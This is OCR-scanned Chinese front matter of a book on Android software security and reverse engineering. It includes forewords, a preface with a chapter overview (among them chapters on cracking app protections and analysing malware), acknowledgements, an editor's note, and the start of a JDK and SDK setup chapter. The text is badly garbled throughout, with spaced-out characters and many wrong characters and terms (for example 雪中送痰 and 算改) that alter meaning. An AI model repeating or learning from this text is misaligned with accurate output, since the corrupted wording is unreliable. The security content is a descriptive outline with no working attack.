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第 一 次 看 到 生 强 的 文章 是 在 看 雪 安 全 论坛 ， 他 以 “ 非 虫 ”的 笔名 发 表 
本 儿 篇 Android 安 全 的 文章 。 标 题 很 低调 ， 内 容 却 极为 丰富 ， 远 辑 清 
晰 ， 实 践 性 强 ， 最 重要 的 是 很 有 “干货 *。 后 来 得 知 他 在 写 书 ， 一 和 直 保 持 
关注 ,今日 终于 要 出 版 了 。 

这 本 书 的 价值 无 疑 是 巨大 的 。 

在 此 之 前 ， 即 便 我 们 把 范围 扩大 到 全 球 ， 也 没有 哪 本 书 具 体 而 系统 
地 专门 介绍 Android 逆 同 撤 术 和 安全 分 析 技 术 。 这 可 能 有 多 方面 的 原 
因 ， 但 其 中 最 重要 的 一 点 是 竞争 与 利益 。 推 动 信 息 安 全 技术 发 展 的 ， 除 
了 爱好 者 ， 大 致 可 以 分 为 三 类 : 学 术 研 究 人 员 、 企 业 研 发 人 员 、 攻 击 
者 。 

在 Android 安 全 方向 ， 研 究 人 员 相 对 更 为 开放 一 一 许多 团队 开放 了 
系统 原型 的 源码 ， 或 者 提供 了 可 用 的 工具 一 一 但 有 时 候 他 们 也 只 发 表 论 
文 以 介绍 系统 设计 和 结果 ， 却 不 公开 可 以 复 用 的 资源 。 近 两 年 来 ， 顶 级 
会 议 对 Android 安 全 的 研究 左 为 青睐 ， 他 们 如 此 选择 ， 可 以 理解 。 

在 这 个 市 场 正高 速 增长 的 产业 中 ， 对 企业 而 言 ， 核 心 技术 更 是 直接 
关系 到 产品 的 功能 和 性 能 ， 关 系 到 企业 竞争 力 和 市 场 份额 ， 许 多 企业 会 
为 了 扩大 技术 影响 而 发 布 白 皮 书 ， 但 真正 前 沿 的 、 独 有 的 东西 ， 极 少 会 
轻易 公开 。 

攻击 者 则 了 最 为 神秘 ， 为 了 躲避 风险 ， 他 们 大 都 想 义 一 切 办 法 隐藏 目 
己 的 痕迹 ， 低 调 以 求生 存 。 在 地 下 产业 链 迅速 形 成 后 ， 对 他 们 而 言 ， 安 
全 技术 更 是 非法 获 利 的 根本 保障 。 

在 这 种 情况 下 ， 刚 刚 进入 或 希望 进入 这 一 领域 的 人 会 发 现 ， 他 们 面 
临 的 是 各 种 零散 而 不 成 体系 的 、 质 量 参 次 不 齐 的 、 可 能 泛泛 而 谈 的 、 也 


























可 能 已 经 过 时 的 技术 资料 ， 他 们 不 得 不 去 重复 别人 走 过 的 路 、 犯 别人 犯 
过 的 错 ， 将 精力 消耗 在 这 些 琐碎 之 中 ， 而 难以 真正 跟 上 技术 的 友 展 。 

生 强 的 这 本 书 ， 无 颖 将 大 为 改善 这 种 局 面 ， 堪 称 人 破局 之 作 。 做 到 这 
一 点 央 为 不 易 ， 这 意味 着 大 量 的 阅读 、 总 结 、 尝 试 和 人 创造。 事实 上 , 书 
中 介绍 的 很 多 技术 和 知识 ， 我 此 前 从 未 在 别 的 地 方 看 到 过 。 

另 一 方面 ， 在 Android 这 个 和 平台， 我们 已 经 面临 诸多 的 威胁 。 和 恶意 
代码 数量 呈 指 数 增长 ， 并 且 出 现 了 多 种 对 抗 分 析 、 检 测 、 和 碍 杀 的 技术 ; 
应 用 软件 和 数字 内 容 的 版 权 不 断 遭 到 侵害 ， 软 件 破 解 、 软 件 算 改 、 广 告 
库 修 改 和 植 入 、 悉 意 代码 植 入 、 应 用 内 付费 破解 等 普 衣 存在 ;应 用 软件 
本 喘 的 安全 漏洞 频 索 出 现在 国内 外 互联 网 企业 的 产品 中 ， 数 据 泄露 和 账 
户 和 被 盗 等 潜在 风险 让 人 担忧 ;官方 系统 、 第 三 方 定 制 系统 和 预 装 软 件 的 
漏洞 不 断 被 发 现 ， 对 系统 安全 与 稳定 产生 极 大 的 威胁 ;移动 文 付 从 概念 
逐步 转 为 实践 ， 而 对 通信 技术 的 攻击 、 对 算法 和 协议 的 攻击 时 常用 生 ; 
移动 设备 正 融 入 办 公 环 境 ， 但 移动 平台 的 攻击 与 APT 攻 击 结合 的 趋势 日 
葵 明 显 ..….... 更 糟 的 是 ， 随 着 地 下 产业 链 的 不 断 成 熟 和 扩大 ， 以 及 攻击 技 
术 的 不 断 发 展 和 改进 ， 这 些 威胁 和 相关 攻击 只 会 来 势 更 凶 。 

量 无 疑问 ， 在 Android 安 全 上 我 们 面临 极 大 的 挑战 。 在 这 个 时 候 ， 
生 强 的 这 本 书 起 到 的 将 是 雪 中 送 痰 的 作用 。 

安全 技术 几乎 都 是 双 刃 剑 ， 它 们 既 能 协助 我 们 开发 更 有 效 的 保护 技 
术 ， 也 几乎 必定 会 被 攻击 者 学 习 和 参考 。 这 里 的 问题 是 ， 大 量 安全 技术 
的 首次 大 范围 公开 ， 是 否 会 带 来 广泛 的 模仿 和 学 习 ， 从 而 引发 更 多 的 攻 
击 ? 在 这 个 问题 上 ， 安 全 界 一 直 存 在 争议 。1987 年 出 版 的 一 本 书 中 首次 
公布 了 感染 式 病 毒 的 反 汇 编 代 码 ， 引 发 大 量 模仿 的 新 病毒 出 现 。 上 自 此 ， 
这 个 问题 成 为 每 一 本 里 程 碑 式 的 安全 书籍 都 无 法 绕 开 的 话题 。 我 个 人 更 
喜欢 的 则 是 这 样 一 个 观点 ， 在 《信息 安全 工程 》 中 ，Ross Anderson 
说 : “尽管 一 些 和 恶意 分 子 会 从 这 样 的 书 中 获 益 ， 但 他 们 大 都 已 经 知道 了 
这 些 技巧 ， 而 好 人 们 获得 的 收益 会 多 得 多 。” 


























在 生 强 写 这 本 书 的 过 程 中 ， 我 们 就 不 少 细 节 有 过 交流 和 讨论 。 他 的 
认真 给 我 留 下 了 非常 深刻 的 印象 。 与 其 他 的 安全 书籍 相 比 ， 这 本 书 在 这 
样 几 个 方面 尤为 突出 : 

实践 性 强 。 这 本 书 的 几乎 每 一 个 部 分 ， 都 结合 实际 例子 ， 一 步 步 讲 
解 如 何 操作 。 因 此 ， 它 对 刚 入 门 的 人 或 者 想 快 速 了 解 其 中 某 个 话题 的 人 
会 有 很 大 的 帮助 。 事 实 上 ， 人 缺乏 可 操作 性 ， 是 Android 安 全 方面 现 有 论 
文 、 和 白皮书、 技术 文章 和 书籍 最 大 的 问题 之 一 ， 很 多 人 读 到 最 后 可 能 对 
内 容 有 了 一 些 概念 ， 却 不 知道 从 何 下 手 。 但 这 本 书 则 有 很 大 不 同 。 

时 效 性 强 。 在 交流 中 ， 我 惊讶 地 发 现 ， 刚 刚 发 布 不 久 的 Santoku 虚 
拟 机 、APIMonitor 等 工具 ， 以 及 Androguard 的 新 特性 等 ， 已 经 出 现在 了 
这 本 书 中 。 这 意味 着 ， 生 强 在 一 边 写 作 的 同时 ， 还 一 边关 注 业 界 的 最 新 
进展 ， 并 做 了 学 习 、 尝 试 和 总 结 。 因 此， 这 本 书 将 具有 几乎 和 论文 一 样 
的 时 效 性 。 

深度 和 广度 适当 。 这 本 书 涉及 的 面 很 广 ， 实 际 上 ， 仅 仅 是 目录 本 
身 ， 就 是 一 份 极 好 的 自学 参考 大 纲 。 而 其 中 最 实用 的 那些 话题 ， 例 如 常 
见 C/C++ 代 码 结构 的 ARM 目 标 程 序 反 汇编 特点 ， 没 有 源码 情况 下 对 
Android 软 件 的 调试 技术 等 ， 都 有 深入 的 介绍 。 

此 前 ， 我 曾 写 过 一 本 叫 amatutor 的 Android 恶 意 代码 分 析 教 程 ， 并 通 
过 网 络 分 享 ， 后 来 由 于 时 间 和 精力 暂停 了 更 新 。 这 上段 经 历 让 我 尤其 深刻 
地 体会 到 在 这 样 一 个 新 的 领域 写 出 一 本 好 书 的 不 易 。 一 直 有 人 来 信 硕 望 
我 能 继续 写 ， 但 自从 了 解 到 生 强 的 这 些 工 作 ， 我 就 松 了 一 口气 ， 并 回 他 
们 大 力 推 荐 这 本 书 。 同 时 ， 我 也 辐 周 边 的 同事 、 同 行 推 荐 ， 我 相信 这 本 
书 的 内 容 可 以 证 明 它 的 价值 。 
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看 雪 致 序 


移动 平台 逐渐 成 为 人 们 上 网 的 主要 方式 。 随 着 Android 应 用 的 普 
及 ， 安 全 问题 日 益 突 出 。 出 于 商业 利益 的 考虑 ，Android 系 统 的 所 有 者 
谷歌 ， 一 直 回 避 公 开 讨 论 其 安全 性 。 国 外 用 户 一 般 是 从 谷歌 应 用 商店 下 
载 应 用 ， 由 于 谷歌 自身 安全 检测 机 制 的 保障 ， 其 安全 性 不 太 可 能 出 现 大 
的 问题 。 但 是 ， 中 国 用 户 无 法 直接 访问 谷歌 应 用 商店 ， 大 都 是 通过 国内 
第 三 方 Android 市 场 下 载 应 用 ， 而 谷歌 无 法 控制 第 三 方 的 应 用 商店 。 
此 ， 国 内 的 Android 应 用 安全 问题 更 加 突出 ， 安 全 威胁 更 高 。 

Lookout Mobile Security 移 动 杀毒 软件 公司 预测 : 2013 年 将 有 超过 
1800 万 台 Android 设 备 会 遭遇 某 种 形式 的 恶意 软件 的 攻击 。 国 内 安全 公 
司 的 数据 也 显示 : 流氓 推广 、 和 恶意 扣 避 、 禄 取 用 刀 数 据 等 恶意 软件 增长 
迅速 ， 人 危害 日 益 严 重 。 在 黑色 产业 链 中 ， 骇 客 通过 技术 手段 将 非法 SP 提 
供 的 扣 费 号 段 植 入 到 应 用 中 ， 实 现 恶意 吸 费 。 手 机 通 客 的 攻击 目标 正在 
上 蚁 准 用 户 的 手机 支付 与 消费 行为 。 为 了 更 好 地 防范 恶意 软件 和 骇 客 市 来 
的 威胁 ， 最 好 的 办 法 是 了 解 他 们 的 攻击 方法 和 工具 ， 建 立 技术 壁 爸 。 

目前 市 场 上 研究 Android 安 全 相关 问题 的 图 书 很 少 。 因 此 当 我 拿 到 
看 雪 论 坛 Android 安 全 版 版 主 “ 非 虫 ”( 丰 生 强 先生 的 倾 力 之 作 
《Android 软 件 安 全 与 逆 同 分 析 》 的 书稿 时 非常 高 兴 ， 并 认真 通读 了 全 
文 。 我 感到 这 是 一 本 深入 浅 出 、 可 以 快速 提升 开发 者 Android 安 全 技术 
水 平 的 好 书 ， 其 在 注重 实际 操作 讲解 的 同时 ， 还 特别 重视 一 些 原 理 的 讲 
解 ， 如 Dalvik 虚 拟 机 与 Java 虚 拟 机 的 比较 、APK 加 载 机 理 等 内 容 。 

据 我 所 知 ， 丰 先生 以 前 多 年 从 事 Java 相 关 软 件 的 开发 ， 并 对 Android 
系统 的 全 部 源 代码 进行 过 深入 的 研究 和 分 析 ， 他 有 着 很 强 的 Android 访 
用 开发 能 力 ， 尤 其 在 安全 相关 专业 领域 经 验 丰 宣 。 他 能 够 在 繁忙 的 工作 























之 余 ， 耗 费 大 量 的 时 间 和 精力 为 读者 呈现 这 样 一 部 技术 专 圭 ， 并 顺利 出 
版 ， 不 仅 是 读者 的 幸运 ， 也 是 看 雪 论 坛 的 骄傲 。 在 此 ， 我 对 他 表示 由 更 
地 视 锅 ， 并 期 盼 他 今后 为 读者 带 来 更 多 的 技术 成 果 和 更 大 的 慰 吾 。 








段 钢 
看 雪 安 全 网 站 站 长 
www.pediy.com 


2013 年 1 月 15 日 于 北京 


近 几 年 ，Android 在 国内 的 发 展 极其 迅猛 ， 这 除了 相关 产品 强大 的 
功能 与 丰富 的 应 用 外 ， 更 是 因为 它 优 良 的 性 能 表现 吸引 着 用 户 。2011 年 
可 谓 是 Android 的 风光 年 ， 从 手机 生产 商 到 应 用 开发 者 都 纷纷 捧场 ， 短 
短 几 个 月 的 时 间 ，Android 在 国内 红 遍 了 大 街 小 起 ， 和 截止 到 2012 年 的 第 
一 个 季度 ，Android 在 国内 的 市 场 份额 束 超 过 60%， 将 曾经 风靡 一 时 的 
塞 班 系统 远 远 的 甩 在 了 身后 ， 与 此 同时 ， 它 也 带动 了 国内 移动 互联 网 行 
业 的 发 展 ， 创 造 了 更 多 就 业 的 岗位 ， 国 内 IT 人 士 为 之 省 跃 欢呼 。 

随 着 Android 在 国内 的 兴起 ， 基 于 Android 的 平台 应 用 需求 也 越 来 越 
复杂 。 形 形 色 色 的 软件 壮大 了 Android 市 场 ， 也 丰富 了 我 们 的 生产 生 
活 ， 越 来 越 多 的 人 从 起 初 的 尝试 到 享受 再 到 依赖 ， 沉 漫 在 Android 的 神 
奇 海洋 中 。 事 情 有 利 也 总 有 次 ， 即 使 Android 如 此 优秀 也 会 有 怨声载道 
的 时 候 ， 各 种 信息 泄露 、 恶 意 扣 费 、 系 统 被 破坏 的 事件 也 屡见不鲜 ， 
Android 系 统 的 安全 也 逐渐 成 为 人 们 所 关注 的 话题 。 

如 今 市 场 上 讲解 Android 开 发 的 书籍 已 经 有 很 多 了 ， 从 应 用 软件 开 
发 层 到 系统 底层 的 研究 均 丰 富 涵 盖 ， 其 中 不 乏 一 些 经 典 之 作 ， 然 而 遗憾 
的 是 ， 分 析 Android 软 件 及 系统 安全 的 书籍 却 一 本 也 没有 ， 而 且 相 关 的 
中 文 资料 也 非常 匮乏 ， 这 使 得 普通 用 户 以 及 大 多 数 Android 应 用 开发 者 
对 系统 的 安全 防护 及 软件 本 喘 没 有 一 个 全 面 理性 的 认识 。 因 此 ， 笔 者 决 
定 将 自身 的 实际 经 验 整 理 ， 编 写 为 本 书 。 


内 容 导读 














本 书 主要 从 软件 安全 和 系统 安全 两 个 方面 讲解 Android 平 台 存 在 的 
攻击 与 防范 方法 。 





第 1 章 和 第 2 章 主 要 介绍 Android 分 析 环 境 的 搭建 与 Android 程 序 的 分 
析 方 法 。 

第 3 章 详 细 介 绍 了 Dalvik VM 江 编 语言 ， 它 是 Android 平 台 上 进行 安 
全 分 析 工 作 的 基础 知识 ， 读 者 只 有 和 掌握 了 这 部 分 内 容 才 能 顺利 地 学 习 后 
面 的 章节 。 

第 4 章 介绍 了 Android 平 台 的 可 执行 文件 ， 它 是 Android 软 件 得 以 运行 
的 基石 ， 我 们 大 多 数 的 分 析 工 作 都 是 基于 它 ， 因 此 这 部 分 内 容 必 须 党 
握 。 

第 5 章 起 正式 开始 了 对 Android 程 序 的 分 析 ， 对 这 部 分 的 理解 与 运用 
完全 是 建立 在 前 面 章节 的 基础 之 上 。 这 一 章 详 细 讲 述 了 Android 软 件 的 
各 种 反 汇编 代码 特征 ， 以 及 可 供 使 用 的 分 析 工 具 ， 如 何 合理 搭配 使 用 它 
们 是 这 章 需 要 学 习 的 重点 。 

第 6 章 主 要 讲解 ARM 汇 编 语 言 的 基础 知识 ， 在 这 一 章 中 ， 会 对 ARM 
汇编 指令 集 做 一 个 简要 的 介绍 ， 为 下 一 章 的 学 习 做 铺垫。 

第 7 章 是 本 书 的 一 个 高 级 部 分 ， 主 要 介绍 了 基于 ARM 架 构 的 Android 
原生 程序 的 特点 以 及 分 析 它 们 的 方法 ， 读 者 需要 在 这 一 章 中 仔细 的 体会 
并 实践 ， 鉴 于 此 类 程序 目前 在 市 场 上 比较 流行 ， 读 者 在 阅读 时 需要 多 进 
行 实践 操作 ， 多 动手 分 析 这 类 代码 ， 加 强 自 己 的 逆向 分 析 能 

第 8 章 介 绍 了 Android 平 台 上 软件 的 动态 调试 技术 ， 动 态 调试 与 静态 
分 析 是 逆向 分 析 程 序 时 的 两 大 主要 技术 手段 ， 各 有 痢 优 缺点 ， 通 过 动态 
调试 可 以 让 你 看 到 软件 运行 到 某 一 点 时 程序 的 状态 ， 对 了 解 程序 执行 流 
程 有 很 大 的 帮助 。 

第 9 和 章 详 细 介 绍 了 Android 平 台 软 件 的 破解 方法 。 主 要 分 析 了 目前 市 
场 上 一 些 常见 的 Android 程 序 保护 方法 ， 分 析 它 们 的 保护 效果 以 及 介绍 
如 何 对 它们 进行 破解 ， 通 过 对 本 章 的 学 习 ， 读 者 会 对 Android 平 台 上 的 
软件 安全 有 一 种 “ 忧 然 大 悟 ?的 感觉 。 

第 10 章 介绍 了 在 面 对 软 件 可 能 被 破解 的 情况 下 ， 如 何 加 强 Android 


















































平台 软件 的 保护 ， 内 容 与 第 9 章 是 对 立 的 ， 只 有 同时 掌握 了 攻 与 防 ， 才 
能 将 软件 安全 真正 地 掌握 到 位 。 

第 11 章 从 系统 安全 的 角度 出 发 ， 分 析 了 Android 系 统 中 不 同 环节 可 
能 存在 的 安全 隐患 ， 同 时 介绍 了 面 对 这 些 安全 问题 时 ， 如 何 做 出 相应 的 
保护 措施 。 另 外 ， 本 章 的 部 分 小 节 还 从 开发 人 员 的 角度 出 发 ， 讲 解 不 安 
全 代码 对 系统 造成 的 危害 ， 读 者 在 掌握 这 部 分 内 容 后 ， 编 写 代 码 的 安全 
意识 会 明显 提高 。 

第 12 章 采用 病毒 实战 分 析 的 方式 ， 将 前 面 所 学 的 知识 全 面 展 示 并 加 
以 应 用 ， 让 读者 能 彻底 地 掌握 分 析 Android 程 序 的 方法 。 本 章 的 内 容 详 
实 、 知 识 涵 盖 范 围 广 ， 读 者 完全 掌握 本 章 内 容 后 ， 以 后 动手 分 析 
Android 程 序 时 ， 便 能 够 信和 手 牛 来 。 

为 了 使 读者 对 文中 所 讲述 的 内 容 有 深刻 的 认识 ， 并 且 在 阅读 时 避免 
感到 乏味 ， 书 中 的 内 容 不 会 涉及 太 多 的 基础 理论 知识 ， 而 更 多 的 是 采用 
动手 实践 的 方式 进行 讲解 ， 所 以 在 阅读 本 书 前 假定 读者 已 经 掌握 了 
Android 程 序 开 发 所 必 备 的 基础 知识 ， 如 果 读 者 还 不 具备 这 些 基础 知识 
的 话 ， 请 先 打 好 基础 后 再 阅读 本 书 。 


适合 的 读者 

本 书 适合 以 下 读者 : 

e Android 应 用 开发 者 、Android 系 统 开 发 工程 师 、Android 系 统 安 
全 二 作者 5 




















本 书 约定 
为 了 使 书 中 讲述 的 知识 更 加 容易 理解 ， 思 路 更 加 清晰 ， 本 书 做 了 如 
下 约定 : 


e@ 本 书 在 讲解 部 分 内 容 时 ， 可 能 会 对 Android 系 统 与 内 核 的 源码 加 
以 引用 ， 如 文中 无 具体 说 明 系 统 版 本 ， 则 统一 为 Android ”4.1 的 系统 ， 


Linux 3.4 的 内 核 。 

e 本 书 不 介绍 Android 系 统 源码 的 下 载 方法 ， 假 定 读者 已 经 自行 下 
载 好 了 Android 系 统 源码 。 

e。 本 书 在 引用 Android 系 统 源码 时 ， 为 了 避免 代码 占用 过 多 篇 幅 及 
影响 主体 的 分 析 思 路 ， 在 不 影响 理解 的 情况 下 ， 对 摘抄 的 内 容 进行 了 适 
量 的 删 减 。 

e 本 书 在 列举 实例 代码 时 ， 为 了 方便 读者 阅读 与 理解 ， 对 代码 中 
的 关键 部 分 采用 加 粗 显示 。 

e 本 书 中 在 给 出 命令 的 格式 用 法 时 ， 为 了 醒目 起 见 ， 采 用 斜体 显 








示 。 
e 对 于 部 分 操作 容易 发 生 错 误 或 理解 上 造成 收 义 的 地 方 ， 本 书 会 
在 下 和 面 加 上 文本 框 注解 。 如 : 
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Smali 代 码 的 语法 与 格式 会 在 本 书 第 3 章 进行 详细 介绍 。 


本 书 源 代码 

下 载 地 址 : 

http://www .ituring.com.cn/book/1131 

点 击 “ 随 书 下 载 ? 即 可 看 到 本 书 源 代码 的 下 载 链接 。 

本 书 正 文中 提 到 的 “ 随 书 的 附 图 x” 也 一 并 打包 在 源 代码 中 。 
致谢 


首先 ， 要 感谢 本 书 的 编辑 陈 冰 先生 。 在 编写 本 书 时 ， 陈 冰 先 生 对 书 
中 每 个 划 节 的 细 市 都 严格 把 天 ， 并 多 次 耐心 地 教导 我 写作 的 拉 巧 ， 是 他 
对 书稿 质量 的 严格 要 求 ， 以 及 对 工作 的 一 丝 不 苟 ， 才 使 得 本 书 得 以 顺序 
出 版 。 





感谢 我 的 父母 ， 是 他 们 养育 了 我 ， 给 了 我 生命 ， 他 们 永远 是 我 心中 
最 伟大 的 人 。 

写作 本 身 是 一 件 很 辛苦 的 事 ， 尤 其 是 每 天 还 要 被 生活 中 的 琐事 困 
扰 。 在 这 里 ， 我 要 感谢 这 半年 多 来 对 我 无 言 文 持 的 大 哥 与 大 嫂 ， 大 媳 可 
口 的 饭菜 补充 了 我 每 天 写作 所 需 的 营养 ， 而 大 哥 更 是 帮助 我 解决 了 很 多 
烦心 的 琐事 ， 让 我 在 写作 时 无 后 顾 之 忧 。 

好 书 总 能 给 人 带 来 心灵 上 的 震撼 。 感 谢 美 女 作 家 李 沉 尹 ， 是 她 那 扣 
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感谢 那些 共享 Android 安 全 技术 的 组 织 与 个 人 ， 如 果 没 有 他 们 前 期 
的 奉献 ， 笔 者 现在 可 能 还 处 在 独自 探索 的 阶段 ， 不 可 能 有 机 会 与 大 家 分 
享 如 此 前 沿 的 技术 。 

看 雪 学 院 是 国内 最 具 权 威 性 的 软件 安全 研究 论坛 。 感 谢 看 雪 学 院 站 
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作者 : 丰 生 强 
2012 年 11 月 2 日 


编辑 的 证 


每 一 本 书 的 诞生 ， 都 有 让 人 记 住 的 事情 。 在 这 本 书 的 出 版 中 ， 我 印 
象 深刻 的 是 三 点 : 

一 ， 作 者 丰 生 强 在 第 一 次 给 我 交 来 样 稳 时 ， 其 粗糙 不 规范 的 写 书 格 
式 和 读 起 来 不 是 那么 顺 溜 的 语言 表达 让 我 国 了 一 下 ， 我 耐心 的 (也 或 许 
是 有 些 耐 着 性 子 的 ? ) 在 QQ 上 边 截 图 边 详细 地 告诉 了 他 有 了 哪些 地 方 的 
格式 被 他 忽略 了 ， 有 哪些 地 方 的 话说 得 不 够 清楚 。 

我 说 完 后 ， 他 说 他 会 认真 修改 好 后 再 次 给 我 发 来 。 但 说 实话 ， 我 心 
里 没 指望 他 第 一 次 束 能 把 格式 给 改 好 ， 因 为 对 于 第 一 次 写 书 的 作者 来 
说 ， 这 种 情况 几乎 不 曾 出 现 过 。 我 做 了 继续 指导 第 3、4 次 的 心理 准备 。 
证 我 没 想到 的 是 ， 几 天 后 他 第 二 次 交 来 的 稿件 就 相当 前 仔 ， 让 我 多 少 有 
些 不 相信 和 目 己 的 眼 上 量 ， 格 式 规范 美观 ， 语 言 流畅 清楚 ， 很 难 相信 这 是 同 
一 个 人 仅 相 隅 几 天 后 的 作品 。 他 跟 我 说 他 是 一 个 字 一 个 字 地 来 阅读 和 修 
改 每 句 话 的 。 

二 ， 他 是 很 少 的 按时 且 保质 保 量 完成 书稿 的 。 对 于 作者 ， 不 管 水 平 
高 低 ， 大 多 都 擅长 干 一 件 事 情 一 一 拖 稿 ， 而 策划 编辑 不 得 不 被 迫 干 另 一 
件 事 情 一 一 催 稿 。 但 丰 生 强 以 实际 行动 打破 了 这 一 魔 巡 ， 他 努力 工作 ， 
在 合同 规定 的 期 限 内 按时 交 来 了 全 稿 。 作 为 对 作者 拖 稳 见怪 不 怪 的 一 名 
朱 划 编辑 来 说 ， 纵 然 不 至 于 说 是 老 泪 纵横 吧 ， 那 也 是 感触 民 多 啊 。 

但 从 为 一 角度 说 ， 那 些 能 完全 视 合同 交 稳 期 限 为 无 物 的 作者 也 着 实 
让 人 不 敢 小 磺 ， 这 得 有 多 强大 的 心理 素质 才能 做 到 这 一 点 呢 ， 就 这 么 心 
平 气 地 跨 过 了 最 后 期 限 。 真 心 让 人 纠结 。 

三 ， 在 整个 写作 过 程 中 ， 在 谈 及 技术 时 ， 丰 生 强 所 表现 出 的 那些 热 
情 、 专 注 和 乐观 。 我 一 直 信 奉 的 一 点 是 ， 如 果 一 个 作者 不 能 在 他 所 钻研 




















的 领域 体会 到 乐趣 和 笠 福 ， 那 这 样 的 作者 写 出 来 的 东西 是 不 值得 一 读 
的 。 好 的 内 容 束 像 好 的 食材 ， 而 那 份 热情 和 乐趣 则 是 喜 饪 的 手法 。 
现在 ， 书 已 经 打开 ， 和 希望 你 会 喜欢 。 


本 书 策 划 编 辑 陈 冰 
2013 年 1 月 15 日 


第 1 章 ” Android 程序 分 析 环 境 挫 建 








在 实际 的 Android 软 件 开 发 过 程 中 ， 可 能 很 多 开发 人 员 有 过 这 样 的 
经 历 : 

e 我 有 一 个 不 错 的 idea， 正 在 开发 一 球 类 似 想法 的 软件 ， 可 是 涉 
及 到 的 一 些 功 能 上 的 具体 代码 细节 却 难以 下 手 ， 我 看 到 别人 的 程序 中 有 
这 个 功能 ， 它 们 是 如 何 实现 的 呢 ? 

e 我 不 小 心安 装 了 一 个 流 谍 软件， 软件 运行 时 会 自动 下 载 木马 程 
序 、 恶 意 扣 费 、 算 改 手机 系统 ， 它 是 如 何 做 到 这 些 的 呢 ? 

e 我 按照 网 上 介绍 的 方法 来 分 析 Android 程 序 ， 可 是 根本 就 无 法 正 
确 地 反 编 译 程序 ， 或 是 反 编 译 出 的 代码 语法 混乱 ， 根 本 无 法 阅读 。 

这 些 场景 都 提出 了 一 个 疑问 ， 那 就 是 如 何 分 析 一 个 Android 应 用 程 
序 ? 如 何 掌握 这 些 软件 的 架构 思想 ? 分 析 别 人 的 程序 在 很 多 人 看 来 是 不 
能 够 接受 的 行为 ， 在 他 们 眼中 这 种 行为 都 应 被 视 为 次 入。 其 实 任何 技术 
的 起 源 本 身 就 是 从 学 习 开 始 的 ， 用 正确 的 态度 对 待 程序 分 析 技 术 是 可 以 
的 。 

如 果 说 ， 开 发 Android 程 序 是 一 种 学 问 ， 那 么 分 析 Android 程 序 更 像 
是 一 门 艺术 。 在 浩瀚 如 海 的 反 汇 编 代码 中 分 析出 程序 的 执行 流程 与 架构 
思想 是 一 件 很 了 不 起 的 事情 ， 这 需要 分 析 人 员 有 着 扎实 的 编程 基础 与 深 
厚 的 思维 分 析 能 力 。 分 析 软 件 的 过 程 犹 如 一 次 艰难 的 旅程 ， 这 条 旅程 会 
有 多 长 ? 该 怎么 走 ? 会 有 多 少 崎 赋 险 路 ? 没有 人 知道 ， 但 是 先行 者 已 经 
为 我 们 铺 下 了 人 台阶， 我 们 只 需 沿 着 它 慢 慢 前 行 。 


























1.1 Windows 分 析 环 境 搭建 


搭建 Windows 分 析 平 台 的 系统 版 本 要 求 不 高 ，Windows XP 或 以 上 即 
可 。 本 书 的 Windows 平 台 的 分 析 环 境 采 用 Windows XP 32 位 系统 ， 如 果 


读者 使 用 Windows 7 或 其 他 版 本 ， 操 作 上 是 大 同 小 异 的 。 


1.1.1 安装 JDK 





JDK 是 Android 开 发 必须 的 运行 环境 ， 在 安装 JDK 之 前 ， 首 先 到 


Oracle 公 司 官 网 上 下 载 它 。 下 载 地 址 为 : 


http://www.oracle.com/technetwork/java/javase/downloads/index.html， 打 
开 下 载 页 面 ， 目 前 最 新 版 本 为 Java SE 6 Update 33， 如 图 1-1 所 示 。 








Java SE 6 Update 33 JDK JRE 
This release includes security enhancements and bug 
fixes. Learn more + 
JDK 6 Docs JRE 6 Docs 
" Installation " Installation 
Instructions Instructions 
" Read\e " Readhle 


" ReleaseNotes 





" ReleaseNotes 





" Oracle " Oracle 
License License 

" Java SE " Java SE 
Products Products 

" Third Party "Third Party 
Licenses Licenses 

" Certified " Certified 
System System 


Configurations 


Configurations 


图 1-1 下 载 JDK 
点 击 JDK 下 面 的 DOWNLOAD 按 钮 进入 下 载 页 面 ， 勾 选 “Accept 
License Agreement” 单 选 框 ， 然 后 点 击 jdk-6u33-windows-i586.exe 进 行 下 
载 。 下 载 完成 后 双击 安 姜文 件 ， 启 动 JDK 安 装 界 面 ， 如 图 1-2 所 示 。 


六 Java(TH) SE Developaent Kit 6 Update 33 - 设置 


ORACLE 


欢迎 使 用 Java(TM) SE Development Kit 6 Update 33 安装 癌 导 


此 向 导 将 引导 您 完成 Java SE Development Kit 5 Update 33 的 安装 过 程 。 








图 1-2” ”JDK 安装 界面 


与 安装 其 他 Windows 软 件 一 样 ，JDK 的 安装 过 程 也 很 简单 ， 只 需要 
不 停 点 击 下 一 步 就 可 以 顺利 安装 完成 。 安 装 完 成 后 手动 添加 
JAVA_HOME 环 境 变量 ， 值 为 “C:\Program ” FilesJavayjdk1.6.0_33”， 并 
将 “C:\Program ”Files\Java\jdk1.6.0_33\bin” 添 加 到 PATH 变 量 中 。 如 图 1-3 
所 示 。 

















编辑 用 户 变 量 


JAVA_HONE 


C:\Program Files\Java\jdkl.6.0 33 


确定 取消 


path 


Program Files\Java\jdkl.6.0 33\bin.: 


确定 取消 








图 1-3 ”设置 Java 环 境 变量 


完成 所 有 步骤 后 检查 一 下 Java 是 否 安装 成 功 。 单 击 *“ 开 始 ” 按 钮 ， 选 
择 “ 运 行 ”， 在 出 现 的 对 话 框 中 输入 CMD 命 令 打 开 CMD 窗 口 ， 在 CMD 窗 
口中 输入 java-version， 如 果 屏 幕 上 出 现 如 图 1-4 所 示 的 提示 ， 说 明 安 装 
成 功 。 


ce C:\WINDOYS\systen32\cad. exe 


Microsoft Windows XP [版 本 5.1.2699] 
<C》 版 权 所 有 1985-2991 Microsoft Corp. 


cc:\Documents and Settings‘ Mdministrator>?java ~—version 

jaua uekFrsion "1.6.9_ 337” 

JavacIM SE Runtime Environment build 1.6.09 33-hbg93y)》 

WUJaua HotSpotIM Client UM 《hbuildu 209.8-bg3。mixedu mode 。 Sharingy)> 


c:\Documents and SettingsNhdministhatokr>。 

















图 1-4 查看 Java 是 否 正 确 安装 

















1.1.2 安装 Android SDK 


Android SDK 是 以 zip 压 缩 包 的 形式 提供 给 开发 人 员 的 。 首 先 到 
Android 官 网 下 载 最 新 版 本 的 SDK， 下 载 地 址 为 : 
http://developer.android.com/sdk/index.html。SDK 提 供 了 压缩 包 与 安装 文 
件 两 种 方式 供 开 发 者 下 载 ， 为 了 方便 部 车 ， 本 书 末 用 下 载 安 疙 文件 的 方 
式 直 接 安 装 ， 目 前 Android ”SDK 的 最 新 版 本 为 r 20， 完 整 下 载 地 址 为 : 
http://dl.google.com/androidinstaller_r20-windows.exe。 

双击 下 载 后 的 安装 文件 ， 将 Android SDK 安 装 到 任意 位 置 ， 本 书 安 
